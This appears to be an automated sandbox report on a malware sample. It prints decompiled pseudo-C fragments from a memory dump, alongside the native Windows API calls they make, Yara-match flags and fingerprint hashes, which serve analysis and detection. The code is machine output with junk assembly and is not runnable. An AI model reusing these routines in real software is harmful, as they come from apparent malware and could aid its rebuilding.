                                                                                                                                                                                                          			}










                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                                                                          • Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                                          			E004181BA(void* __ebx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, void* _a48) {
                                                                                                                                                                                                          				void* _v3;
                                                                                                                                                                                                          				intOrPtr _t15;
                                                                                                                                                                                                          				signed char _t16;
                                                                                                                                                                                                          				long _t21;
                                                                                                                                                                                                          				long _t23;
                                                                                                                                                                                                          				void* _t31;
                                                                                                                                                                                                          				long _t36;
                                                                                                                                                                                                          				long _t39;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				asm("adc esp, [edi+eax*8+0x55749e0c]");
                                                                                                                                                                                                          				_t36 = _t39;
                                                                                                                                                                                                          				_t15 = _a4;
                                                                                                                                                                                                          				_t23 =  *(_t15 + 0x10);
                                                                                                                                                                                                          				_t3 = _t15 + 0xc40; // 0xc40
                                                                                                                                                                                                          				_t16 = E00418DC0(_t31, _t15, _t3, _t23, 0, 0x28);
                                                                                                                                                                                                          				 *(__ebx - 0x3b7cd3b3) =  *(__ebx - 0x3b7cd3b3) ^ _t23;
                                                                                                                                                                                                          				asm("adc al, 0x52");
                                                                                                                                                                                                          				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _t23, _t16 ^ 0x0000008b, _t36); // executed
                                                                                                                                                                                                          				return _t21;
                                                                                                                                                                                                          			}











                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                          • Opcode ID: edcc572d20d658b09244c3f101f520ca345bd06ac2fcb3511e7a9f272df0d7fc
                                                                                                                                                                                                          • Instruction ID: fae6ffa33bf77168ea0cd424f9f4fd6a4ef7e0647b005e22d2a95e62c3cf46de
                                                                                                                                                                                                          • Opcode Fuzzy Hash: edcc572d20d658b09244c3f101f520ca345bd06ac2fcb3511e7a9f272df0d7fc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E01A4B2211108ABCB48CF89DC95DEB77A9EF8C754F158248FA1997241D630E8518BA4
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E004183A0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                                                                                                                                                          				long _t14;
                                                                                                                                                                                                          				void* _t21;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t3 = _a4 + 0xc60; // 0xca0
                                                                                                                                                                                                          				E00418DC0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                                                                                                                                                          				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                                                                                                                                          				return _t14;
                                                                                                                                                                                                          			}





                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2167126740-0
                                                                                                                                                                                                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                                                                          • Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                                                          			E004182F0(void* __esi, intOrPtr _a4, void* _a8) {
                                                                                                                                                                                                          				long _t8;
                                                                                                                                                                                                          				void* _t11;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t5 = _a4;
                                                                                                                                                                                                          				_t2 = _t5 + 0x10; // 0x300
                                                                                                                                                                                                          				_t3 = _t5 + 0xc50; // 0x409743
                                                                                                                                                                                                          				E00418DC0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                                                                                                                                                                          				_t8 = NtClose(_a8);
                                                                                                                                                                                                          				asm("rcr byte [esi+0x5d], 1");
                                                                                                                                                                                                          				return _t8;
                                                                                                                                                                                                          			}





                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Close
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3535843008-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
• Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
• Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
• Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
• Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
• Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
• Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp
• Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 95%
                                                                                                                                                                                                          			E004088B0(intOrPtr _a4) {
                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                                          				char _v284;
                                                                                                                                                                                                          				char _v804;
                                                                                                                                                                                                          				char _v840;
                                                                                                                                                                                                          				void* _t24;
                                                                                                                                                                                                          				signed int _t31;
                                                                                                                                                                                                          				signed int _t33;
                                                                                                                                                                                                          				void* _t34;
                                                                                                                                                                                                          				signed int _t39;
                                                                                                                                                                                                          				void* _t50;
                                                                                                                                                                                                          				intOrPtr _t52;
                                                                                                                                                                                                          				void* _t53;
                                                                                                                                                                                                          				void* _t54;
                                                                                                                                                                                                          				void* _t55;
                                                                                                                                                                                                          				void* _t56;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t52 = _a4;
                                                                                                                                                                                                          				_t39 = 0; // executed
                                                                                                                                                                                                          				_t24 = E00406E00(_t52,  &_v24); // executed
                                                                                                                                                                                                          				_t54 = _t53 + 8;
                                                                                                                                                                                                          				if(_t24 != 0) {
                                                                                                                                                                                                          					E00407010( &_v24,  &_v840);
                                                                                                                                                                                                          					_t55 = _t54 + 8;
                                                                                                                                                                                                          					do {
                                                                                                                                                                                                          						E00419CD0( &_v284, 0x104);
                                                                                                                                                                                                          						E0041A340( &_v284,  &_v804);
                                                                                                                                                                                                          						_t56 = _t55 + 0x10;
                                                                                                                                                                                                          						_t50 = 0x4f;
                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                          							_t31 = E00413DD0(__eflags, E00413D70(_t52, _t50),  &_v284);
                                                                                                                                                                                                          							_t56 = _t56 + 0x10;
                                                                                                                                                                                                          							__eflags = _t31;
                                                                                                                                                                                                          							if(_t31 != 0) {
                                                                                                                                                                                                          								break;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t50 = _t50 + 1;
                                                                                                                                                                                                          							__eflags = _t50 - 0x62;
                                                                                                                                                                                                          							if(_t50 <= 0x62) {
                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							L8:
                                                                                                                                                                                                          							_t33 = E00407040( &_v24,  &_v840);
                                                                                                                                                                                                          							_t55 = _t56 + 8;
                                                                                                                                                                                                          							__eflags = _t33;
                                                                                                                                                                                                          							if(_t33 != 0) {
                                                                                                                                                                                                          								goto L9;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							goto L10;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t9 = _t52 + 0x14; // 0xffffe1a5
                                                                                                                                                                                                          						_t10 = _t52 + 0x474;
                                                                                                                                                                                                          						 *_t10 =  *(_t52 + 0x474) ^  *_t9;
                                                                                                                                                                                                          						__eflags =  *_t10;
                                                                                                                                                                                                          						_t39 = 1;
                                                                                                                                                                                                          						goto L8;
                                                                                                                                                                                                          						L9:
                                                                                                                                                                                                          						__eflags = _t39;
                                                                                                                                                                                                          					} while (_t39 == 0);
                                                                                                                                                                                                          					L10:
                                                                                                                                                                                                          					_t34 = E004070C0(_t52,  &_v24); // executed
                                                                                                                                                                                                          					__eflags = _t39;
                                                                                                                                                                                                          					if(_t39 == 0) {
                                                                                                                                                                                                          						asm("rdtsc");
                                                                                                                                                                                                          						asm("rdtsc");
                                                                                                                                                                                                          						_v8 = _t34 - 0 + _t34;
                                                                                                                                                                                                          						_t16 = _t52 + 0x55c;
                                                                                                                                                                                                          						 *_t16 =  *(_t52 + 0x55c) + 0xffffffba;
                                                                                                                                                                                                          						__eflags =  *_t16;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                                                                                                                                                                                                          					_t20 = _t52 + 0x31; // 0x5608758b
                                                                                                                                                                                                          					_t21 = _t52 + 0x32;
                                                                                                                                                                                                          					 *_t21 =  *(_t52 + 0x32) +  *_t20 + 1;
                                                                                                                                                                                                          					__eflags =  *_t21;
                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					return _t24;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                                                                                                                                                          • Instruction ID: aa626ceb7ef0a3bcdbf1efb1d9dc2f5a7bb3811b4857f0e914c6161f28eec10c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE213AB3D402085BDB10E6649D42BFF73AC9B50304F44057FF989A3182F638BB4987A6
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 74%
                                                                                                                                                                                                          			E00407260(void* __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, long _a8) {
                                                                                                                                                                                                          				char _v67;
                                                                                                                                                                                                          				char _v68;
                                                                                                                                                                                                          				void* _t12;
                                                                                                                                                                                                          				intOrPtr* _t13;
                                                                                                                                                                                                          				int _t14;
                                                                                                                                                                                                          				void* _t21;
                                                                                                                                                                                                          				long _t24;
                                                                                                                                                                                                          				intOrPtr* _t28;
                                                                                                                                                                                                          				void* _t29;
                                                                                                                                                                                                          				void* _t33;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t33 = __eflags;
                                                                                                                                                                                                          				_t21 = __edx;
                                                                                                                                                                                                          				_v68 = 0;
                                                                                                                                                                                                          				E00419D20( &_v67, 0, 0x3f);
                                                                                                                                                                                                          				E0041A900(__ebx, _t21,  &_v68, 3);
                                                                                                                                                                                                          				_t12 = E00409B20(_t33, _a4 + 0x1c,  &_v68); // executed
                                                                                                                                                                                                          				_t13 = E00413E30(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                                                                                                                                                                          				_t28 = _t13;
                                                                                                                                                                                                          				if(_t28 != 0) {
                                                                                                                                                                                                          					_t24 = _a8;
                                                                                                                                                                                                          					_t14 = PostThreadMessageW(_t24, 0x111, 0, 0);
                                                                                                                                                                                                          					asm("salc"); // executed
                                                                                                                                                                                                          					_t35 = _t14;
                                                                                                                                                                                                          					if(_t14 == 0) {
                                                                                                                                                                                                          						_t14 =  *_t28(_t24, 0x8003, _t29 + (E00409280(_t35, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					return _t14;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return _t13;
                                                                                                                                                                                                          			}














                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessagePostThread
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1836367815-0
                                                                                                                                                                                                          • Opcode ID: b429a28fbdaf8ade12dc58879e230a39c476b9a6de75f7f862eb8cc2ee54f132
                                                                                                                                                                                                          • Instruction ID: bbcd0b2e5740072d15388175686a93538b06234ac68ffc2b081785cbfc84dfa6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b429a28fbdaf8ade12dc58879e230a39c476b9a6de75f7f862eb8cc2ee54f132
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B01D431A8022876E720A6959C03FFF772C9B00B54F05405EFF04BA1C2E6A87D0682EA
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 20%
                                                                                                                                                                                                          			E00407233(void* __eax, signed int __edx, void* __esi) {
                                                                                                                                                                                                          				intOrPtr* _t6;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t6 = __eax - 0xe1;
                                                                                                                                                                                                          				asm("das");
                                                                                                                                                                                                          				asm("das");
                                                                                                                                                                                                          				asm("loop 0x62");
                                                                                                                                                                                                          				asm("adc esp, [ebp-0x751e73a0]");
                                                                                                                                                                                                          				 *(__esi + 0x68) =  *(__esi + 0x68) | __edx;
                                                                                                                                                                                                          				_push(__esi);
                                                                                                                                                                                                          				_push(0x11c6f95e);
                                                                                                                                                                                                          				asm("adc eax, ebp");
                                                                                                                                                                                                          				 *_t6 =  *_t6 + _t6;
                                                                                                                                                                                                          				return E004195B0(0x24) + _t6 + 0x1000;
                                                                                                                                                                                                          			}





                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessagePostThread
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1836367815-0
                                                                                                                                                                                                          • Opcode ID: 7997dd6130d69d6a6cdf66612845a13fcb068ba07fa9f9ab66acc80c3af8de7a
                                                                                                                                                                                                          • Instruction ID: c471a7a482c4acc8b97cc48f06a4835c8e75f01e11c13bfe5c3798fee8e62ae7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7997dd6130d69d6a6cdf66612845a13fcb068ba07fa9f9ab66acc80c3af8de7a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4F0E931E842243AE72056555C03FFAB7589B80B11F14457FFE44B92C2E6A96C0686E6
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 50%
                                                                                                                                                                                                          			E00418621(void* __edx, intOrPtr* __esi, void* __eflags, int _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                                                                                                                                                          				char _v117;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				if(__eflags > 0) {
                                                                                                                                                                                                          					asm("adc al, 0x50");
                                                                                                                                                                                                          					_push(_a16);
                                                                                                                                                                                                          					_push(_a12);
